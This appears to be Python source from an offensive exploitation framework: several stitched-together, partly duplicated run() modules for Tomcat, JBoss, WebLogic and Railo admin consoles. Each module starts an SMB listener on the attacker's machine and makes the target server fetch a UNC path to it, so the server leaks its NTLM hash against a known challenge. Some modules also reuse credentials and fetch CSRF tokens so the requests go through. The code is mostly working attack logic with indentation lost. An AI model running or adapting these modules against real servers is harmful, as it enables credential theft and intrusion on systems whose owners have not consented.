def run(self, fingerengine, fingerprint):
""" Same concept as the JBoss module, except we actually invoke the
deploy function.
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
if fingerprint.version in ["5.5"]:
uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\
'deployWar=file://{0}/asdf.war'.format(utility.local_address())
elif fingerprint.version in ["6.0", "7.0", "8.0"]:
return self.runLatter(fingerengine, fingerprint, thread)
else:
utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version,
LOG.ERROR)
return
url = base + uri
response = utility.requests_get(url)
if response.status_code == 401:
utility.Msg(
"Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(url,
cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
def run(self, fingerengine, fingerprint):
""" Same as JBoss/Tomcat
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\
'=/com/bea/console/actions/app/install/appSelected'
data = {
"AppApplicationInstallPortletselectedAppPath":
"\\\\{0}\\fdas.war".format(utility.local_address()),
"AppApplicationInstallPortletfrsc":
None
}
if fingerprint.title is WINTERFACES.WLS:
base = base.replace("http", "https")
utility.Msg(
"Host %s:%s requires auth, checking.." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint)
if cookies[0]:
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
# fetch our CSRF
data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(
base, cookies[0])
utility.Msg("Invoking UNC loader...")
try:
_ = utility.requests_post(base + uri,
data=data,
cookies=cookies[0],
timeout=1.0)
except:
# we dont care about the response here
pass
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin
sleep(1)
self._Listen = False
def run(self, fingerengine, fingerprint):
""" This module will invoke jboss:load() with a UNC path to force the
server to make a SMB request, thus giving up its encrypted hash with a
value we know (1122334455667788).
Thanks to @cd1zz for the idea for this
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener..")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC loader...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
uri = '/jmx-console/HtmlAdaptor'
data = self.getData(fingerprint.version)
url = base + uri
response = utility.requests_post(url, data=data)
if response.status_code == 401:
utility.Msg(
"Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_post(url,
data=data,
cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 500:
utility.Msg("Unexpected response: HTTP %d" % response.status_code,
LOG.DEBUG)
self._Listen = False
def run(self, fingerengine, fingerprint):
""" Same concept as the JBoss module, except we actually invoke the
deploy function.
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
if fingerprint.version in ["5.5"]:
uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\
'deployWar=file://{0}/asdf.war'.format(utility.local_address())
elif fingerprint.version in ["6.0", "7.0", "8.0"]:
return self.runLatter(fingerengine, fingerprint, thread)
else:
utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version, LOG.ERROR)
return
url = base + uri
response = utility.requests_get(url)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(url, cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
def run(self, fingerengine, fingerprint):
""" This module will invoke jboss:load() with a UNC path to force the
server to make a SMB request, thus giving up its encrypted hash with a
value we know (1122334455667788).
Thanks to @cd1zz for the idea for this
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener..")
self._Listen= True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC loader...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = '/jmx-console/HtmlAdaptor'
data = self.getData(fingerprint.version)
url = base + uri
response = utility.requests_post(url, data=data)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_post(url, data=data,
cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 500:
utility.Msg("Unexpected response: HTTP %d" % response.status_code, LOG.DEBUG)
self._Listen = False
def run(self, fingerengine, fingerprint):
""" Same as JBoss/Tomcat
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\
'=/com/bea/console/actions/app/install/appSelected'
data = { "AppApplicationInstallPortletselectedAppPath" :
"\\\\{0}\\fdas.war".format(utility.local_address()),
"AppApplicationInstallPortletfrsc" : None
}
if fingerprint.title is WINTERFACES.WLS:
base = base.replace("http", "https")
utility.Msg("Host %s:%s requires auth, checking.." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint)
if cookies[0]:
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
# fetch our CSRF
data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(base, cookies[0])
utility.Msg("Invoking UNC loader...")
try:
_ = utility.requests_post(base+uri, data=data, cookies=cookies[0],
timeout=1.0)
except:
# we dont care about the response here
pass
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin
sleep(1)
self._Listen = False
def run(self, fingerengine, fingerprint):
""" Create a search collection via a nonexistent
datasource
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
uri = "/railo-context/admin/web.cfm?action=services.search"
data = {
"collName": "asdf",
"collPath": "\\\\{0}\\asdf".format(utility.local_address()),
"collLanguage": "english",
"run": "create"
}
url = base + uri
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookies:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
self._Listen = False
return
response = utility.requests_post(url, data=data, cookies=cookies)
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
